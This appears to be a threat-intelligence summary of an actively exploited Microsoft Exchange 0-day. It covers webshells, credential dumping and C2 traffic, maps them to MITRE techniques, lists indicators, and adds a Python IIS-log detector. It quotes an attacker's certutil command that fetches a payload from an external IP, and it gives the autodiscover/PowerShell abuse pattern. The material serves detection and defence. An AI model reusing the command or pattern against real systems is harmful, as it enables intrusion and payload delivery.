GTSC’s security team documented a 0-day remote code execution vulnerability in Microsoft Exchange being actively exploited in August 2022, leading to webshell deployment, credential dumping, and lateral movement. They provided a temporary, community-focused remediation (URL rewrite rule to block autodiscover usage) while awaiting an official patch, and released scanning tools to help defenders detect exploitation. hashtags: #MicrosoftExchange #Antsword #ProxyShell #Chopper #GTSC #Autodiscover
Keypoints
- GTSC detected a 0-day Exchange vulnerability being exploited to achieve remote code execution on multiple targets.
- Attackers dropped web shells on Exchange servers, with obfuscated payloads and use of Antsword for webshell management.
- Files such as RedirSuiteServiceProxy.aspx were modified to host webshell content; suspicious files appeared across various paths.
- Command execution involved Windows commands via certutil to fetch payloads, with a distinctive end-signature (echo [S]&cd&echo [E]) matching the China Chopper pattern.
- Credential dumping occurred via dropped components (e.g., all.exe and dump.dll), with data compressed and exfiltrated using rar.exe.
- DLL-based malware with Run/m classes listened on port 443 and communicated with a fixed C2 address, using RC4 for C2 traffic.
- GTSC recommended immediate mitigation via IIS URL Rewrite to block suspected autodiscover activity and released a scanning tool for IIS logs.
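Detection logic of the kind the IIS log scanner performs, as an added example that is not GTSC's tool: a small parser for W3C-format IIS logs that flags autodiscover.json requests carrying an "@" and reaching the PowerShell path with a 200 response. The regular expression is an assumption based on the publicly documented mitigation pattern (the page states only that the rule blocks suspected autodiscover activity), and the log lines are constructed.

```python
import re
from typing import Dict, Iterator, List

# Assumed detection pattern (mirrors the public mitigation, not quoted from the page):
# an autodiscover.json request whose query carries an '@' and reaches PowerShell.
SUSPICIOUS = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)


def parse_iis_log(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per W3C Extended log row, keyed by the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed rows instead of mis-aligning columns
        yield dict(zip(fields, values))


def find_suspicious_requests(text: str) -> List[Dict[str, str]]:
    """Return rows matching the autodiscover/PowerShell pattern that got HTTP 200."""
    hits = []
    for entry in parse_iis_log(text):
        target = entry.get("cs-uri-stem", "") + "?" + entry.get("cs-uri-query", "")
        if SUSPICIOUS.search(target) and entry.get("sc-status") == "200":
            hits.append(entry)
    return hits


# Constructed sample log (not from the page); row 2 mimics the abuse shape,
# row 3 shows the same request rejected and therefore not reported.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2022-08-08 10:00:01 198.51.100.7 GET /owa/ - 200
2022-08-08 10:00:05 198.51.100.9 POST /autodiscover/autodiscover.json a@EXAMPLE/PowerShell/ 200
2022-08-08 10:00:09 198.51.100.9 POST /autodiscover/autodiscover.json a@EXAMPLE/PowerShell/ 401
"""

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-uri-stem"], hit["cs-uri-query"])
```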
MITRE Techniques
- [T1505.003] Server Software Component: Web Shell – Webshells, mostly obfuscated, were dropped to Exchange servers. Quote: “We detected webshells, mostly obfuscated, being dropped to Exchange servers.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Attacker commands executed via cmd, including:
“cmd” /c cd /d “c:\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]
- [T1047] Windows Management Instrumentation – Execution included WMIC usage to run dropped files. Quote: “and executes these files through WMIC.”
- [T1036.005] Masquerading: Match Legitimate Name or Location – RedirSuiteServiceProxy.aspx was modified to contain webshell content while appearing as a legitimate file. Quote: “the hacker also changes the content of the file RedirSuiteServiceProxy.aspx to webshell content.”
- [T1620] Reflective Code Loading – DLL loads and executes C# bytecode received from requests. Quote: “Load and execute C# bytecode received from request.”
- [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping performed via dropped files (e.g., all.exe and dump.dll). Quote: “all.exe and dump.dll are responsible for credentials dumping on the server system.”
- [T1083] File and Directory Discovery – Listing directory and file information. Quote: “Case 3: Call to method ld, which is responsible for listing directory and file information in the format.”
- [T1049] System Network Connections Discovery – The malware checked network connectivity using certutil, a legitimate Windows tool, before communicating with its C2. Quote: “checks connections through certutil, which is a legitimate tool available in the Windows environment.”
- [T1570] Lateral Tool Transfer – Lateral movements to other servers within the system. Quote: “Lateral movements to other servers in the system.”
- [T1560.001] Archive Collected Data: Archive via Utility – Dumped data compressed with rar.exe and copied to webroot. Quote: “rar.exe to compress dumped files and copy them to the webroot of the Exchange server.”
Indicators of Compromise
- [IP] – 125.212.220.48, 5.180.61.17, and other listed IPs connected to C2/command infrastructure
- [URL] – http://206.188.196.77:8080/themes.aspx (defanged: hxxp://206.188.196.77:8080/themes.aspx) and other resource URLs used to fetch payloads; https://httpbin.org/get
- [C2] – 137.184.67.33 (C2 server address used by the DLL)
- [FileName] – RedirSuiteServiceProxy.aspx, Xml.ashx, pxh4HG1v.ashx, errorEE.aspx, Dll.dll, 180000000.dll
- [FileHash] – be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257; 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82; 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
- [Path] – C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth, C:\inetpub\wwwroot\aspnet_client, C:\root\DrSDKCaller.exe, C:\Users\Public\all.exe